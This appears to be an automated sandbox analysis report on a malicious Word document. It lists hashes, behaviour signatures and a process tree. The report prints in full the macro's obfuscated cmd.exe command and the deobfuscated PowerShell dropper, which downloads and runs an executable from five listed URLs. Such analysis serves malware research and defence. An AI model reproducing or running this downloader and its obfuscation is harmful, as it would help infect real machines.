Analysis

  • max time kernel
    134s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-04-2024 01:32

General

  • Target

    0413f92d3b2f6300a0ed5d6d362ef09c_JaffaCakes118.doc

  • Size

    65KB

  • MD5

    0413f92d3b2f6300a0ed5d6d362ef09c

  • SHA1

    e0ed8f26783e15a4fcc44b13997912295dc52bad

  • SHA256

    58c6de98959ad1e8fa0c907b8132e557f516944676936af659f6c80b1ac2804e

  • SHA512

    20ae21f5f8456c4cbb3a294f54aaf4c2ab7330a2d994f91eee7ac2f1a56b08697821af3158f3050d37878b166d8a9930ba12ccefb2f9339c87b921acef952388

  • SSDEEP

    768:cpJcaUitGAlmrJpmxlzC+w99NBz+1o80cZBv0fNNfw/i9m57MI2:cptJlmrJpmxlRw99NBz+a8vBi

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://abporter.org/zhniYMNIL

exe.dropper

http://bearinmindstrategies.com/of7Cpb8

exe.dropper

http://ondacapital.es/EwCyzzc

exe.dropper

http://landspa.ir/Nl9U64Eg0

exe.dropper

http://shoshana.ge/QwlUmzzVaF

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0413f92d3b2f6300a0ed5d6d362ef09c_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4316
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /V^:ON/C"^se^t ^Ke= ^ ^ ^ ^ ^ ^ ^ }^}{hc^tac};^kaer^b^;zkw$ ^m^e^tI^-^e^kovn^I;)zk^w^$ ,^Z^UV$(^eliFdao^ln^woD^.a^z^l${^yrt{)j^FV$^ ni ZUV$(^hcaerof;'^e^xe^.^'^+q^pv$+'\^'^+c^ilbu^p:vne$=^z^kw$;^'^45^6^' =^ q^pv$;)'^@'(^t^ilp^S^.^'^F^aV^z^zm^U^lwQ/^eg.^ana^h^s^o^h^s//^:p^t^t^h@0gE4^6U^9^lN/ri^.^ap^sdn^al//^:ptt^h@cz^zyCwE/^s^e^.^la^t^i^pac^a^dno//^:^ptth^@^8^b^pC^7f^o/moc.se^ige^tarts^dni^mnira^e^b//^:^pt^th^@^LIN^M^Y^in^hz/gr^o.re^tr^o^pb^a//:^pt^th'=^jFV^$^;^tn^eilCb^eW.^teN tc^e^jb^o-^w^en^=azl^$ ^lleh^srewop&&^for /^L %^D ^in (3^6^7;^-1^;^0)^d^o s^e^t ^if=!^if!!^Ke:~%^D,1!&&i^f %^D ^l^ss ^1 c^a^l^l %^if:^*^if^!=%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $lza=new-object Net.WebClient;$VFj='http://abporter.org/zhniYMNIL@http://bearinmindstrategies.com/of7Cpb8@http://ondacapital.es/EwCyzzc@http://landspa.ir/Nl9U64Eg0@http://shoshana.ge/QwlUmzzVaF'.Split('@');$vpq = '654';$wkz=$env:public+'\'+$vpq+'.exe';foreach($VUZ in $VFj){try{$lza.DownloadFile($VUZ, $wkz);Invoke-Item $wkz;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:212

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDACEE.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_thqsrcsw.c5x.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/212-53-0x0000022FA59D0000-0x0000022FA59F2000-memory.dmp

    Filesize

    136KB

  • memory/4316-9-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-557-0x00007FFD5B750000-0x00007FFD5B760000-memory.dmp

    Filesize

    64KB

  • memory/4316-7-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-6-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-5-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-10-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-11-0x00007FFD596F0000-0x00007FFD59700000-memory.dmp

    Filesize

    64KB

  • memory/4316-0-0x00007FFD5B750000-0x00007FFD5B760000-memory.dmp

    Filesize

    64KB

  • memory/4316-15-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-12-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-13-0x00007FFD596F0000-0x00007FFD59700000-memory.dmp

    Filesize

    64KB

  • memory/4316-14-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-17-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-20-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-21-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-19-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-18-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-16-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-8-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-3-0x00007FFD5B750000-0x00007FFD5B760000-memory.dmp

    Filesize

    64KB

  • memory/4316-4-0x00007FFD5B750000-0x00007FFD5B760000-memory.dmp

    Filesize

    64KB

  • memory/4316-40-0x000001AC0C690000-0x000001AC0D660000-memory.dmp

    Filesize

    15.8MB

  • memory/4316-41-0x000001AC0C690000-0x000001AC0D660000-memory.dmp

    Filesize

    15.8MB

  • memory/4316-42-0x000001AC0C690000-0x000001AC0D660000-memory.dmp

    Filesize

    15.8MB

  • memory/4316-43-0x000001AC0C690000-0x000001AC0D660000-memory.dmp

    Filesize

    15.8MB

  • memory/4316-23-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-1-0x00007FFD5B750000-0x00007FFD5B760000-memory.dmp

    Filesize

    64KB

  • memory/4316-2-0x00007FFD5B750000-0x00007FFD5B760000-memory.dmp

    Filesize

    64KB

  • memory/4316-533-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-534-0x000001AC0C690000-0x000001AC0D660000-memory.dmp

    Filesize

    15.8MB

  • memory/4316-535-0x000001AC0C690000-0x000001AC0D660000-memory.dmp

    Filesize

    15.8MB

  • memory/4316-536-0x000001AC0C690000-0x000001AC0D660000-memory.dmp

    Filesize

    15.8MB

  • memory/4316-537-0x000001AC0C690000-0x000001AC0D660000-memory.dmp

    Filesize

    15.8MB

  • memory/4316-558-0x00007FFD5B750000-0x00007FFD5B760000-memory.dmp

    Filesize

    64KB

  • memory/4316-559-0x00007FFD5B750000-0x00007FFD5B760000-memory.dmp

    Filesize

    64KB

  • memory/4316-560-0x00007FFD5B750000-0x00007FFD5B760000-memory.dmp

    Filesize

    64KB

  • memory/4316-22-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB

  • memory/4316-561-0x00007FFD9B6D0000-0x00007FFD9B8C5000-memory.dmp

    Filesize

    2.0MB